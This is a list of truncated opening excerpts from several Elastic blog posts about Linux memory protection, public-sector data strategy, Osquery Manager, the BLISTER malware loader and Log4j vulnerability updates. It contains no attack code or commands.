,Overview With our recent 7.16 Elastic Security product release, we improved our existing Linux malware feature by adding memory protection. In this blog, brought to you by Elastic’s Engineering Security Team, we lean into this recent advancement to show how we are protecting the world’s data from attack. Recent events such as the exploitation of the Open Management Infrastructure (OMI) agent through CVE-2021-38647, which is installed by many Azure Linux machines, represents how quickly adv
,As we kick off a new year, so does new and refreshed thinking in the public sector. With another full year of lessons learned from the pandemic, public sector leaders will apply these insights in the way they execute their documented data strategies. Synthesizing what we see and hear from our stakeholders, below are five of the needle movers we see in public sector data strategy execution. Note that the key here is data, and being deliberate with it: 2022 will be the year of harnessing the pow
,Government data strategies lay a promising groundwork for how data will be used to drive more informed decision making internally and more streamlined public services externally. A commonality between these strategies is the need for improved role-based data sharing and data re-use. The sticking point, however, is in the way to implement data sharing when there are known silos across and within various departments. More often than not, these silos exist for good reason, particularly for data pr
,With the Elastic 7.16 release, Osquery Manager is now generally available for Elastic Agent, making it easier than ever to deploy and run Osquery across your environments. By collecting Osquery data and combining it with the power of the Elastic Stack, you can greatly expand your endpoint telemetry, enabling enhanced detection and investigation, and improved hunting for vulnerabilities and anomalous activities. This blog post gives a brief intro to the Osquery Manager integration for Elastic Ag
,Key takeaways:Elastic Security uncovered a stealthy malware campaign that leverages valid code signing certificates to evade detectionA novel malware loader, BLISTER was used to execute second stage malware payloads in-memory and maintain persistenceThe identified malware samples have very low or no detections on VirusTotalElastic provided layered prevention coverage from this threat out of the boxOverviewThe Elastic Security team identified a noteworthy cluster of malicious activity after revi
,We are pleased to announce new versions of Elasticsearch and Logstash, 7.16.2 and 6.8.22, to upgrade to the latest release of Apache Log4j and address false positive concerns with some vulnerability scanners. Elastic also maintains ongoing updates via our advisory to ensure our Elastic customers and our communities can stay up-to-date on the latest developments. December 10th started with the public disclosure of the Apache Log4j vulnerability - CVE-2021-44228 affecting the popular open sourc
,Welcome to Elastic’s Log4j2 vulnerability information hub. Here we will explain what the specific Log4j2 vulnerability is, why it matters, and what tools and resources Elastic is providing to help negate the opportunity for malware exploits, cyberattacks, and other cybersecurity risks stemming from Log4j2. What is Log4j2? Log4j2 is an open source logging framework incorporated into many Java based applications on both end-user systems and servers. It is one of the most popular logging librarie
